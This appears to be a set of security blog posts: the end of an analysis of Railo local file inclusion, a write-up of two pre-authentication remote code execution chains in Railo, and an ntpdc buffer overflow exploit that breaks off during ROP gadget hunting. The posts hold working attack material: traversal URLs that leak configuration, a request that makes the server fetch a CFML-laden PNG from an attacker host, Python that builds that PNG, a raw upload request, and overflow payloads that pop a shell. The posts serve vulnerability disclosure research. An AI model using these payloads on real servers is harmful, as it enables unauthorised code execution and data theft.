By fetching this page with attributes.src set to another CFM file elsewhere on disk, we can load that file and execute any tags contained therein. As we've done above, let's grab railo-web.xml.cfm; we can do this with the following URL: http://host:8888/railo-context/admin/img.cfm?attributes.src=../../../../railo-web.xml&thistag.executionmode=start which simply returns

<?xml version="1.0" encoding="UTF-8"?><railo-configuration pw="d34535cb71909c4821babec3396474d35a978948455a3284fd4e1bc9c547f58b" version="4.2">

This vulnerability exists in 3.3 – 4.2.1 (latest), and is exploitable out-of-the-box on both Railo installed and Express editions. Though you can only pull CFM files, the configuration file dumps plenty of juicy information. It may also be beneficial for custom tags, plugins, and custom applications that may house other vulnerable/sensitive information hidden away from the URL.

Curiously, at first glance it looks like it may be possible to turn this LFI into an RFI. Unfortunately it’s not quite that simple; if we attempt to access a non-existent file, we see the following:

The error occurred in zip://C:\Documents and Settings\bryan\My Documents\Downloads\railo\railo-express-4.2.1.000-jre-win32\webapps\ROOT\WEB-INF\railo\context\railo-context.ra!/admin/img.cfm: line 29

Notice the zip:// handler. This prevents us from injecting a path to a remote host with any other handler. If, however, the tag looked like this:

<cfinclude>#attributes.src#</cfinclude>

Then it would have been trivially exploitable via RFI. As it stands, it’s not possible to modify the handler without prior code execution.

To sum up the LFI’s: all versions and all installs are vulnerable via the img.cfm vector. All versions and all express editions are vulnerable via the Jetty LFI. Versions <= 4.0 and all installs are vulnerable to the XXE vector. This gives us reliable LFI in all current versions of Railo.

This concludes our pre-authentication LFI portion of this assessment, which will crescendo with our final post detailing several pre-authentication RCE vulnerabilities. I expect a quick turnaround for part four, and hope to have it out in a few days. Stay tuned!

railo security - part four - pre-auth remote code execution

27 August 2014 at 21:00

Part one – intro
Part two – post-auth rce
Part three – pre-auth password retrieval
Part four – pre-auth remote code execution

This post concludes our deep dive into the Railo application server by detailing not only one, but two pre-auth remote code execution vulnerabilities. If you’ve skipped the first three parts of this blog post to get to the juicy stuff, I don’t blame you, but I do recommend going back and reading them; there’s some important information and details back there. In this post, we’ll be documenting both vulnerabilities from start to finish, along with some demonstrations and notes on clusterd’s implementation on one of these.

The first RCE vulnerability affects versions 4.1 and 4.2.x of Railo, 4.2.1 being the latest release. Our vulnerability begins with the file thumbnail.cfm, which Railo uses to store admin thumbnails as static content on the server. As previously noted, Railo relies on authentication measures via the cfadmin tag, and thus none of the cfm files actually contain authentication routines themselves.

thumbnail.cfm first generates a hash of the image along with its width and height:

<cfset url.img=trim(url.img)>
<cfset id=hash(url.img&"-"&url.width&"-"&url.height)>
<cfset mimetypes={png:'png',gif:'gif',jpg:'jpeg'}>

Once it’s got a hash, it checks if the file exists, and if not, attempts to read and write it down:

<cffile action="readbinary" file="#url.img#" variable="data">
<cfimage action="read" source="#data#" name="img">

<!--- shrink images if needed --->
<cfif img.height GT url.height or img.width GT url.width>
    <cfif img.height GT url.height >
        <cfimage action="resize" source="#img#" height="#url.height#" name="img">
    </cfif>
    <cfif img.width GT url.width>
        <cfimage action="resize" source="#img#" width="#url.width#" name="img">
    </cfif>
    <cfset data=toBinary(img)>
</cfif>

The cffile tag is used to read the raw image and then cast it via the cfimage tag. The wonderful thing about cffile is that we can provide URLs that it will arbitrarily retrieve. So, our URL can be this:

192.168.1.219:8888/railo-context/admin/thumbnail.cfm?img=http://192.168.1.97:8000/my_image.png&width=5000&height=50000

And Railo will go and fetch the image and cast it. Note that if the image is larger than the supplied width and height, Railo will attempt to resize it; we don't want this, and thus we provide large width and height values. This file is written out to /railo/temp/admin-ext-thumbnails/[HASH].[EXTENSION].
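
Predicting where the file lands is straightforward; a sketch of the naming, assuming CFML's hash() default of uppercase-hex MD5:

import hashlib

def thumbnail_path(img_url, width, height, ext='png'):
    # id = hash(url.img & "-" & url.width & "-" & url.height), per thumbnail.cfm
    h = hashlib.md5('%s-%s-%s' % (img_url, width, height)).hexdigest().upper()
    return '/railo/temp/admin-ext-thumbnails/%s.%s' % (h, ext)

print thumbnail_path('http://192.168.1.97:8000/my_image.png', 5000, 50000)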

We’ve now successfully written a file onto the remote system, and need a way to retrieve it. The temp folder is not accessible from the web root, so we need some sort of LFI to fetch it. Enter jsloader.cfc.

jsloader.cfc is a Railo component used to fetch and load Javascript files. In this file is a CF tag called get, which accepts a single argument lib, which the tag will read and return. We can use this to fetch arbitrary Javascript files on the system and load them onto the page. Note that it MUST be a Javascript file, as the extension is hard-coded into the file and null bytes don’t work here, like they would in PHP. Here’s the relevant code:

<cfset var filePath = expandPath('js/#arguments.lib#.js')/>
    <cfset var local = {result=""} /><cfcontent type="text/javascript">
        <cfsavecontent variable="local.result">
            <cfif fileExists(filePath)>
                <cfinclude template="js/#arguments.lib#.js"/>
            </cfif>
        </cfsavecontent>
    <cfreturn local.result />

Let’s tie all this together. Using thumbnail.cfm, we can write well-formed images to the file system, and using the jsloader.cfc file, we can read arbitrary Javascript. Recall how log injection works with PHP; we can inject PHP tags into arbitrary files so long as the file is loaded by PHP, and parsed accordingly. We can fill a file full of junk, but if the parser has its way a single <?php phpinfo(); ?> will be discovered and executed; the CFML engine works the same way.

Our attack becomes much clearer: we generate a well-formed PNG file, embed CFML code into the image metadata, set the extension to .js, and write it via thumbnail.cfm. We then retrieve the file via jsloader.cfc and, because we’re loading it with a CFM file, it will be parsed and executed. Let’s check this out:

$ ./clusterd.py -i 192.168.1.219 -a railo -v4.1 --deploy ./src/lib/resources/cmd.cfml --deployer jsload

        clusterd/0.3.1 - clustered attack toolkit
            [Supporting 6 platforms]

 [2014-06-15 03:39PM] Started at 2014-06-15 03:39PM
 [2014-06-15 03:39PM] Servers' OS hinted at windows
 [2014-06-15 03:39PM] Fingerprinting host '192.168.1.219'
 [2014-06-15 03:39PM] Server hinted at 'railo'
 [2014-06-15 03:39PM] Checking railo version 4.1 Railo Server...
 [2014-06-15 03:39PM] Checking railo version 4.1 Railo Server Administrator...
 [2014-06-15 03:39PM] Checking railo version 4.1 Railo Web Administrator...
 [2014-06-15 03:39PM] Matched 2 fingerprints for service railo
 [2014-06-15 03:39PM]   Railo Server Administrator (version 4.1)
 [2014-06-15 03:39PM]   Railo Web Administrator (version 4.1)
 [2014-06-15 03:39PM] Fingerprinting completed.
 [2014-06-15 03:39PM] This deployer (jsload_lfi) requires an external listening port (8000).  Continue? [Y/n] > 
 [2014-06-15 03:39PM] Preparing to deploy cmd.cfml...
 [2014-06-15 03:40PM] Waiting for remote server to download file [5s]]
 [2014-06-15 03:40PM] Invoking stager and deploying payload...
 [2014-06-15 03:40PM] Waiting for remote server to download file [7s]]
 [2014-06-15 03:40PM] cmd.cfml deployed at /railo-context/cmd.cfml
 [2014-06-15 03:40PM] Finished at 2014-06-15 03:40PM

A couple of things to note: as you may notice, the module currently requires the Railo server to connect back twice, once for the image with embedded CFML and a second time for the payload. We embed only a stager in the image, which then connects back for the actual payload.
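
For reference, embedding CFML into a well-formed PNG only takes a few lines of Python. This is a minimal sketch per the PNG spec; the payload string and output filename are illustrative:

import struct, zlib

def chunk(ctype, data):
    # a PNG chunk is length + type + data + CRC32(type + data)
    return struct.pack(">I", len(data)) + ctype + data + \
           struct.pack(">I", zlib.crc32(ctype + data) & 0xffffffff)

payload = b"<cfoutput>#now()#</cfoutput>"  # stand-in for the real stager
png = b"\x89PNG\r\n\x1a\n"
png += chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0))  # 1x1, 8-bit RGB
png += chunk(b"tEXt", b"Comment\x00" + payload)  # CFML rides in the metadata
png += chunk(b"IDAT", zlib.compress(b"\x00\x00\x00\x00"))  # filter byte + one pixel
png += chunk(b"IEND", b"")

with open("my_image.png", "wb") as f:
    f.write(png)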

Sadly, the LFI was unknowingly killed in 4.2.1 with the following fix to jsloader.cfc:

<cfif arguments.lib CT "..">
    <cfheader statuscode="400">
    <cfreturn "// 400 - Bad Request">
</cfif>

The arguments.lib variable contains our controllable path, but it kills our ability to traverse out. Unfortunately, we can’t substitute the .. with unicode or UTF-16 due to the way Jetty and Java are configured by default. This file is pretty much useless to us now, unless we can write into the folder that jsloader.cfc reads from; then we don’t need to traverse out at all.

We can still pop this on Express installs, due to the Jetty LFI discussed in part 3. By simply traversing into the extensions folder, we can load up the Javascript file and execute our shell. Railo installs still prove elusive.

buuuuuuuuuuuuuuuuuuuuuuuuut

Recall the img.cfm LFI from part 3; by tip-toeing back into the admin-ext-thumbnails folder, we can summon our vulnerable image and execute whatever coldfusion we shove into it. This proves to be an even better choice than jsloader.cfc, as we don’t need to traverse as far. This bug only affects versions 4.1 – 4.2.1, as thumbnail.cfm wasn’t added until 4.1. CVE-2014-5468 has been assigned to this issue.

The second RCE vulnerability is a bit easier and has a larger attack surface, spanning all versions of Railo. As previously noted, Railo does not do per page/URL authentication, but rather enforces it when making changes via the <cfadmin> tag. Due to this, any pages doing naughty things without checking with the tag may be exploitable, as previously seen. Another such file is overview.uploadNewLangFile.cfm:

<cfif structKeyExists(form, "newLangFile")>
    <cftry>
        <cffile action="UPLOAD" filefield="form.newLangFile" destination="#expandPath('resources/language/')#" nameconflict="ERROR">
        <cfcatch>
            <cfthrow message="#stText.overview.langAlreadyExists#">
        </cfcatch>
    </cftry>
    <cfset sFile = expandPath("resources/language/" & cffile.serverfile)>
    <cffile action="READ" file="#sFile#" variable="sContent">
    <cftry>
        <cfset sXML     = XMLParse(sContent)>
        <cfset sLang    = sXML.language.XMLAttributes.label>
        <cfset stInLang = GetFromXMLNode(sXML.XMLRoot.XMLChildren)>
        <cfcatch>
            <cfthrow message="#stText.overview.ErrorWhileReadingLangFile#">
        </cfcatch>
    </cftry>

I mean, this might as well be an upload form to write arbitrary files. It’s stupid simple to get arbitrary data written to the system:

POST /railo-context/admin/overview.uploadNewLangFile.cfm HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8888/railo-context/admin/server.cfm
Connection: keep-alive
Content-Type: multipart/form-data; boundary=AaB03x
Content-Length: 140

--AaB03x
Content-Disposition: form-data; name="newLangFile"; filename="xxxxxxxxx.lang"
Content-Type: text/plain

thisisatest
--AaB03x--
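
For convenience, the same upload as a python-requests one-liner (host and filename are illustrative):

import requests

url = "http://192.168.1.219:8888/railo-context/admin/overview.uploadNewLangFile.cfm"
files = {"newLangFile": ("xxxxxxxxx.lang", "thisisatest", "text/plain")}
print(requests.post(url, files=files).status_code)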

The tricky bit is where it’s written to; Railo uses a compression system that dynamically generates compressed versions of the web resources contained within railo-context.ra. A mirror of these can be found under the following:

[ROOT]\webapps\ROOT\WEB-INF\railo\temp\compress

The compressed data is then obfuscated behind two more folders, both MD5s. In my example, it becomes:

[ROOT]\webapps\ROOT\WEB-INF\railo\temp\compress\88d817d1b3c2c6d65e50308ef88e579c\0bdbf4d66d61a71378f032ce338258f2

So we cannot simply traverse into this path, as the hashes change every single time a file is added, removed, or modified. I’ll walk the logic used to generate these, but as a precursor, we aren’t going to figure these out without some other fashionable info disclosure bug.

The hashes are calculated in railo-java/railo-core/src/railo/commons/io/res/type/compress/Compress.java:

temp=temp.getRealResource("compress");                
temp=temp.getRealResource(MD5.getDigestAsString(cid+"-"+ffile.getAbsolutePath()));
if(!temp.exists())temp.createDirectory(true);
}
catch(Throwable t){}
}

    if(temp!=null) {
        String name=Caster.toString(actLastMod)+":"+Caster.toString(ffile.length());
        name=MD5.getDigestAsString(name,name);
        root=temp.getRealResource(name);
        if(actLastMod>0 && root.exists()) return;

The first hash is then cid + "-" + ffile.getAbsolutePath(), where cid is the randomly generated ID found in the id file (see part two) and ffile.getAbsolutePath() is the full path to the classes resource. This is doable if we have the XXE, but on 4.1+ the XXE is patched and the cid is out of reach.

The second hash is actLastMod + ":" + ffile.length(), where actLastMod is the last modified time of the file and ffile.length() is the obvious file length. Again, this is likely not brute forceable without a serious infoleak vulnerability. Hosts <= 4.0 are exploitable, as we can list files with the XXE via the following:

bryan@debdev:~/tools/clusterd$ python http_test_xxe.py 
88d817d1b3c2c6d65e50308ef88e579c

[SNIP - in which we modify the path to include ^]

bryan@debdev:~/tools/clusterd$ python http_test_xxe.py
0bdbf4d66d61a71378f032ce338258f2

[SNIP - in which we modify the path to include ^]

bryan@debdev:~/tools/clusterd$ python http_test_xxe.py
admin
admin_cfc$cf.class
admin_cfm$cf.class
application_cfc$cf.class
application_cfm$cf.class
component_cfc$cf.class
component_dump_cfm450$cf.class
doc
doc_cfm$cf.class
form_cfm$cf.class
gateway
graph_cfm$cf.class
jquery_blockui_js_cfm1012$cf.class
jquery_js_cfm322$cf.class
META-INF
railo_applet_cfm270$cf.class
res
templates
wddx_cfm$cf.class

http_test_xxe.py is just a small hack I wrote to exploit the XXE, with which we eventually obtain both valid hashes. So we can exploit this in versions <= 4.0 Express. Later versions, as far as I can find, have no discernible way of obtaining full RCE without another infoleak or resorting to a slow, loud, painful death of brute forcing two MD5 hashes.
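
For completeness, once the XXE has leaked the cid, the absolute path of the compressed resource, its last modified time, and its length, reproducing both directory names is plain MD5 work. A sketch, assuming the two-argument MD5.getDigestAsString(name, name) reduces to a standard MD5 of the string (the second argument appearing to be a fallback value); all input values below are placeholders for whatever the XXE leaked:

import hashlib

def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()

cid, ra_path = "LEAKED-CID", r"C:\railo\webapps\ROOT\WEB-INF\railo\context\railo-context.ra"
last_mod, length = 1408500000000, 4859232

outer = md5_hex(cid + "-" + ra_path)                # first folder name
inner = md5_hex(str(last_mod) + ":" + str(length))  # second folder name
print(outer, inner)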

The first RCE is currently available in clusterd dev, and a PR is being made to Metasploit thanks to @BrandonPrry. Hopefully it can be merged shortly.

As we conclude our Railo analysis, let’s quickly recap the vulnerabilities discovered during this audit:

Version 4.2:
    - Pre-authentication LFI via `img.cfm` (Install/Express)
    - Pre-authentication LFI via Jetty CVE (Express)
    - Pre-authentication RCE via `img.cfm` and `thumbnail.cfm` (Install/Express)
    - Pre-authentication RCE via `jsloader.cfc` and `thumbnail.cfm` (Install/Express) (Up to version 4.2.0)
Version 4.1:
    - Pre-authentication LFI via `img.cfm` (Install/Express)
    - Pre-authentication LFI via Jetty CVE (Express)
    - Pre-authentication RCE via `img.cfm` and `thumbnail.cfm` (Install/Express)
    - Pre-authentication RCE via `jsloader.cfc` and `thumbnail.cfm` (Install/Express)
Version 4.0:
    - Pre-authentication LFI via XXE (Install/Express)
    - Pre-authentication LFI via Jetty CVE (Express)
    - Pre-authentication LFI via `img.cfm` (Install/Express)
    - Pre-authentication RCE via XXE and `overview.uploadNewLangFile` (Install/Express)
    - Pre-authentication RCE via `jsloader.cfc` and `thumbnail.cfm` (Install/Express)
    - Pre-authentication RCE via `img.cfm` and `thumbnail.cfm` (Install/Express)
Version 3.x:
    - Pre-authentication LFI via `img.cfm` (Install/Express)
    - Pre-authentication LFI via Jetty CVE (Express)
    - Pre-authentication LFI via XXE (Install/Express)
    - Pre-authentication RCE via XXE and `overview.uploadNewLangFile` (Express)

This does not include the random XSS bugs or post-authentication issues. At the end of it all, this appears to be a framework with great ideas, but desperately in need of code TLC. Driving forward with a checklist of features may look nice on a README page, but the desolate wasteland of code left behind can be a scary thing. Hopefully the Railo guys take note and spend some serious time evaluating and improving existing code. The bugs found during this series have been disclosed to the developers; here’s to hoping they follow through.

ntpdc local buffer overflow

6 January 2015 at 21:10

Alejandro Hdez (@nitr0usmx) recently tweeted about a trivial buffer overflow in ntpdc, a deprecated NTP query tool still available and packaged with any NTP install. He posted a screenshot of the crash as the result of a large buffer passed into a vulnerable gets call. After digging into it a bit, I decided it’d be a fun exploit to write, and it was. There are a few quirks to it that make it of particular interest, which I’ve detailed below.

As noted, the bug is the result of a vulnerable gets, which can be crashed with the following:

$ python -c 'print "A"*600' | ntpdc
***Command `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' unknown
Segmentation fault

Loading into gdb on an x86 Debian 7 system:

gdb-peda$ i r eax edx esi
eax            0x41414141   0x41414141
edx            0x41414141   0x41414141
esi            0x41414141   0x41414141
gdb-peda$ x/i $eip
=> 0xb7fa1d76 <el_gets+22>: mov    eax,DWORD PTR [esi+0x14]
gdb-peda$ checksec
CANARY    : ENABLED
FORTIFY   : ENABLED
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

Notice the checksec results of the binary; now compare this to a snippet of the paxtest output:

Mode: Blackhat
Linux deb7-32 3.2.0-4-486 #1 Debian 3.2.63-2+deb7u2 i686 GNU/Linux

Executable anonymous mapping             : Vulnerable
Executable bss                           : Vulnerable
Executable data                          : Vulnerable
Executable heap                          : Vulnerable
Executable stack                         : Vulnerable
Executable shared library bss            : Vulnerable
Executable shared library data           : Vulnerable

And the result of Debian’s recommended hardening-check:

$ hardening-check /usr/bin/ntpdc 
/usr/bin/ntpdc:
 Position Independent Executable: no, normal executable!
 Stack protected: yes
 Fortify Source functions: yes (some protected functions found)
 Read-only relocations: yes
 Immediate binding: no, not found!

Interestingly enough, I discovered this oddity after I had gained code execution in a place I shouldn’t have. We’re also running with ASLR enabled:

$ cat /proc/sys/kernel/randomize_va_space 
2

I’ll explain why the above is interesting in a moment.

So in our current state, we control three registers and an instruction dereferencing ESI+0x14. If we take a look just a few instructions ahead, we see the following:

gdb-peda$ x/8i $eip
=> 0xb7fa1d76 <el_gets+22>: mov    eax,DWORD PTR [esi+0x14] ; deref ESI+0x14 and move into EAX
   0xb7fa1d79 <el_gets+25>: test   al,0x2                   ; test lower byte against 0x2
   0xb7fa1d7b <el_gets+27>: je     0xb7fa1df8 <el_gets+152> ; jump if ZF == 1
   0xb7fa1d7d <el_gets+29>: mov    ebp,DWORD PTR [esi+0x2c] ; doesnt matter 
   0xb7fa1d80 <el_gets+32>: mov    DWORD PTR [esp+0x4],ebp  ; doesnt matter
   0xb7fa1d84 <el_gets+36>: mov    DWORD PTR [esp],esi      ; doesnt matter
   0xb7fa1d87 <el_gets+39>: call   DWORD PTR [esi+0x318]    ; call a controllable pointer 

I’ve detailed the instructions above, but essentially we’ve got a free CALL. In order to reach this, we need an ESI value that at +0x14 will set ZF == 0 (to bypass the test/je) and at +0x318 will point into controlled data.

Naturally, we should figure out where our payload junk is and go from there.

gdb-peda$ searchmem 0x41414141
Searching for '0x41414141' in: None ranges
Found 751 results, display max 256 items:
 ntpdc : 0x806ab00 ('A' <repeats 200 times>...)
gdb-peda$ maintenance i sections
[snip]
0x806a400->0x806edc8 at 0x00021400: .bss ALLOC
gdb-peda$ vmmap
Start      End        Perm  Name
0x08048000 0x08068000 r-xp  /usr/bin/ntpdc
0x08068000 0x08069000 r--p  /usr/bin/ntpdc
0x08069000 0x0806b000 rw-p  /usr/bin/ntpdc
[snip]

Our payload is copied into BSS, which is beneficial as this will remain unaffected by ASLR; further bonus points because our binary wasn’t compiled with PIE. We now need to move back -0x318 and look for a value that will set ZF == 0 with the test al,0x2 instruction. An ESI value of 0x806a9cd satisfies both the +0x14 and +0x318 requirements:

gdb-peda$ x/wx 0x806a9cd+0x14
0x806a9e1:  0x6c61636f
gdb-peda$ x/wx 0x806a9cd+0x318
0x806ace5:  0x41414141
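
Hunting for such a value by hand gets tedious; given a dump of the binary’s writable data, a scan automates it. The helper below is my own, not part of any tool, and the dump filename is illustrative (BSS base and payload address taken from the vmmap/searchmem output above):

def find_esi_candidates(dump, base, payload_lo, payload_hi):
    # need [esi+0x14] to have bit 0x2 set (so the je falls through) and
    # esi+0x318 to land inside our payload, where we control the dword
    for off in range(len(dump) - 0x318):
        if dump[off + 0x14] & 0x2 and payload_lo <= base + off + 0x318 < payload_hi:
            yield base + off

dump = bytearray(open("bss.dump", "rb").read())  # hypothetical dump of 0x806a400+
for addr in find_esi_candidates(dump, 0x806a400, 0x806ab00, 0x806ab00 + 600):
    print(hex(addr))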

After figuring out the offset in the payload for ESI, we just need to plug 0x806a9cd in and hopefully we’ll have EIP:

$ python -c 'print "A"*485 + "C"*4 + "A"*79 + "\xcd\xa9\x06\x08" + "C"*600' > crash.info
$ gdb -q /usr/bin/ntpdc
$ r < crash.info

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x6c61636f ('ocal')
EBX: 0xb7fabff4 --> 0x1fe40 
ECX: 0xb7dc13c0 --> 0x0 
EDX: 0x43434343 ('CCCC')
ESI: 0x806a9cd --> 0x0 
EDI: 0x0 
EBP: 0x0 
ESP: 0xbffff3cc --> 0xb7fa1d8d (<el_gets+45>:   cmp    eax,0x1)
EIP: 0x43434343 ('CCCC')
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x43434343
[------------------------------------stack-------------------------------------]
0000| 0xbffff3cc --> 0xb7fa1d8d (<el_gets+45>:  cmp    eax,0x1)
0004| 0xbffff3d0 --> 0x806a9cd --> 0x0 
0008| 0xbffff3d4 --> 0x0 
0012| 0xbffff3d8 --> 0x8069108 --> 0xb7d7a4d0 (push   ebx)
0016| 0xbffff3dc --> 0x0 
0020| 0xbffff3e0 --> 0xb7c677f4 --> 0x1cce 
0024| 0xbffff3e4 --> 0x807b6f8 ('A' <repeats 200 times>...)
0028| 0xbffff3e8 --> 0x807d3b0 ('A' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x43434343 in ?? ()

Now that we’ve got EIP, it’s a simple matter of stack pivoting to execute a ROP payload. Let’s figure out where that "C"*600 lands in memory and redirect EIP there:

gdb-peda$ searchmem 0x43434343
Searching for '0x43434343' in: None ranges
Found 755 results, display max 256 items:
 ntpdc : 0x806ace5 ("CCCC", 'A' <repeats 79 times>, "Ν©\006\b", 'C' <repeats 113 times>...)
 ntpdc : 0x806ad3c ('C' <repeats 200 times>...)
 [snip]

And we’ll fill it with \xcc to ensure we’re there (theoretically triggering NX):

$ python -c 'print "A"*485 + "\x3c\xad\x06\x08" + "A"*79 + "\xcd\xa9\x06\x08" + "\xcc"*600' > crash.info
$ gdb -q /usr/bin/ntpdc
Reading symbols from /usr/bin/ntpdc...(no debugging symbols found)...done.
gdb-peda$ r < crash.info 
[snip]
Program received signal SIGTRAP, Trace/breakpoint trap.
[----------------------------------registers-----------------------------------]
EAX: 0x6c61636f ('ocal')
EBX: 0xb7fabff4 --> 0x1fe40 
ECX: 0xb7dc13c0 --> 0x0 
EDX: 0xcccccccc 
ESI: 0x806a9cd --> 0x0 
EDI: 0x0 
EBP: 0x0 
ESP: 0xbffff3ec --> 0xb7fa1d8d (<el_gets+45>:   cmp    eax,0x1)
EIP: 0x806ad3d --> 0xcccccccc
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x806ad38:   int    0xa9
   0x806ad3a:   push   es
   0x806ad3b:   or     ah,cl
=> 0x806ad3d:   int3   
   0x806ad3e:   int3   
   0x806ad3f:   int3   
   0x806ad40:   int3   
   0x806ad41:   int3
[------------------------------------stack-------------------------------------]
0000| 0xbffff3ec --> 0xb7fa1d8d (<el_gets+45>:  cmp    eax,0x1)
0004| 0xbffff3f0 --> 0x806a9cd --> 0x0 
0008| 0xbffff3f4 --> 0x0 
0012| 0xbffff3f8 --> 0x8069108 --> 0xb7d7a4d0 (push   ebx)
0016| 0xbffff3fc --> 0x0 
0020| 0xbffff400 --> 0xb7c677f4 --> 0x1cce 
0024| 0xbffff404 --> 0x807b9d0 ('A' <repeats 200 times>...)
0028| 0xbffff408 --> 0x807d688 ('A' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGTRAP
0x0806ad3d in ?? ()
gdb-peda$ 

Er, what? It appears to be executing code in BSS! Recall the output of paxtest/checksec/hardening-check from earlier: NX was clearly enabled. This took me a few hours to figure out, but it ultimately came down to Debian not distributing x86 images with PAE, or Physical Address Extension. PAE is a kernel feature that allows 32-bit CPUs to address more physical memory by adding a third level of paging and doubling the size of each entry in the page table and page directory. This third level of paging and increased entry size is required for NX on x86 architectures because NX adds a single 'don't execute' bit to each page table entry. You can read more about PAE here, and the original NX patch here.

This flag can be tested for with a simple grep of /proc/cpuinfo; on a fresh install of Debian 7, a grep for PAE will turn up empty, but on something with support, such as Ubuntu, you’ll get the flag back.

Because I had come this far already, I figured I might as well get the exploit working. At this point it was simple, anyway:

$ python -c 'print "A"*485 + "\x3c\xad\x06\x08" + "A"*79 + "\xcd\xa9\x06\x08" + "\x90"*4 + "\x68\xec\xf7\xff\xbf\x68\x70\xe2\xc8\xb7\x68\x30\xac\xc9\xb7\xc3"' > input2.file 
$ gdb -q /usr/bin/ntpdc
Reading symbols from /usr/bin/ntpdc...(no debugging symbols found)...done.
gdb-peda$ r < input.file 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
***Command `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<οΏ½AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAΝ©οΏ½οΏ½οΏ½οΏ½hοΏ½οΏ½οΏ½οΏ½hpοΏ½Θ·h0οΏ½Ι·οΏ½' unknown
[New process 4396]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
process 4396 is executing new program: /bin/dash
[New process 4397]
process 4397 is executing new program: /bin/nc.traditional

This uses a simple system payload with hard-coded addresses, because at this point it’s an old-school, CTF-style exploit. And it works. With this trivial PoC working, I decided to check another box I had, to verify whether this configuration is common across distributions. An Ubuntu VM said otherwise:

$ uname -a
Linux bryan-VirtualBox 3.2.0-74-generic #109-Ubuntu SMP Tue Dec 9 16:47:54 UTC 2014 i686 i686 i386 GNU/Linux
$ ./checksec.sh --file /usr/bin/ntpdc
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Full RELRO      Canary found      NX enabled    PIE enabled     No RPATH   No RUNPATH   /usr/bin/ntpdc
$ cat /proc/sys/kernel/randomize_va_space
2

Quite a different story. We need to bypass full RELRO (no GOT overwrites), PIE+ASLR, NX, SSP, and ASCII armor. In our current state, things are looking pretty grim. As an aside, it’s important to remember that because this is a local exploit, the attacker is assumed to have limited control over the system. Ergo, an attacker may inspect and modify the system in the same manner a limited user could. This becomes important with a few techniques we’re going to use moving forward.

Our first priority is stack pivoting; we won’t be able to ROP to victory without control over the stack. There are a few options for this, but the easiest is likely going to be an ADD ESP, ? gadget. The problem with this is that we need to have some sort of control over the stack, or be able to shift ESP somewhere into BSS that we control. Looking at the output of ropgadget, we’ve got 36 options, almost all of which are of the form ADD ESP, ?.

After looking through the list, I determined that none of the values led to control over the stack; in fact, nothing I injected landed on the stack. I did note, however, the following:

gdb-peda$ x/6i 0x800143e0
   0x800143e0: add    esp,0x256c
   0x800143e6: pop    ebx
   0x800143e7: pop    esi
   0x800143e8: pop    edi
   0x800143e9: pop    ebp
   0x800143ea: ret 
gdb-peda$ x/30s $esp+0x256c
0xbffff3a4:  "-1420310755.557158-104120677"
0xbffff3c1:  "WINDOWID=69206020"
0xbffff3d3:  "GNOME_KEYRING_CONTROL=/tmp/keyring-iBX3uM"
0xbffff3fd:  "GTK_MODULES=canberra-gtk-module:canberra-gtk-module"

